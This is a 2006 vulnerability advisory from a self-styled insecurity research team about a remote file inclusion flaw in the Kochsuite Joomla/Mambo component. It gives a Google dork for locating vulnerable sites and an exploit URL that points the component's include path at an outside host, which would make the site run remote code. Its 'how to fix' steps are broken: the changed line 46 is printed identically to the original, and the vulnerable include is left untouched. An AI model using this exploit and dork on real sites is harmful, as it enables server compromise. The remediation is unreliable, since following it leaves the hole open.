|
=0D
.:[ insecurity research team ]:.=0D
.__..____.:.______.____.:.____ .=0D
.:. | |/ \:/ ___// __ \:/ _\.:.=0D
: | | | \\____\\ ___/\ /__ :. .=0D
..: |__|___| /____ >\___ >\___ >.:=0D
.:.. .. .\/ .:\/:. .\/. .:\/:=0D
. ...:. .advisory. .:...=0D
:..................: 18.o8.2oo6 ..=0D
=0D
=0D
Affected Application: Kochsuite v0.9.4=0D
=0D
(Mambo/Joomla CMS Component)=0D
=0D
=0D
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
=0D
=0D
Discoverd by: camino=0D
=0D
Team: Insecurity Research Team=0D
=0D
URL: http://www.insecurityresearch.org=0D
=0D
E-Mail: camino[at]sexmagnet[dot]com=0D
=0D
=0D
=0D
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .=0D
=0D
=0D
Typ: Remote [x] Local [ ]=0D
=0D
Remote File Inclusion [x] SQL Injection [ ]=0D
=0D
Level: Low [ ] Middle [x] High [ ]=0D
=0D
Application: Kochsuite=0D
=0D
Version: 0.9.4=0D
=0D
Vulnerable File: config.kochsuite.php=0D
=0D
URL: http://www.vegisto.com=0D
=0D
Description: It's a component for chiefs to publish theirs stuff...=0D
=0D
Dork: inurl:"com_kochsuite"=0D
=0D
=0D
=0D
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
=0D
=0D
http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/=0D
=0D
config.kochsuite.php?mosConfig_absolute_path=http://huh?=0D
=0D
=0D
=0D
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
=0D
=0D
o1.) open config.kochsuite.php=0D
=0D
o2.) take a look at line 46:=0D
=0D
# Don't allow direct linking defined( '_VALID_MOS' ) or =0D
=0D
die( 'Direct Access to this location is not allowed.' );=0D
=0D
o3.) take a look at line 47:=0D
=0D
require_once ($mosConfig_absolute_path.'/administrator/=0D
=0D
components/com_kochsuite/includes/letters.inc');=0D
=0D
o4.) change line 46:=0D
=0D
defined( '_VALID_MOS' ) or =0D
=0D
die( 'Direct Access to this location is not allowed.' );=0D
=0D
=0D
=0D
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
=0D
=0D
my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members =0D
=0D
of insecurity research team ;-)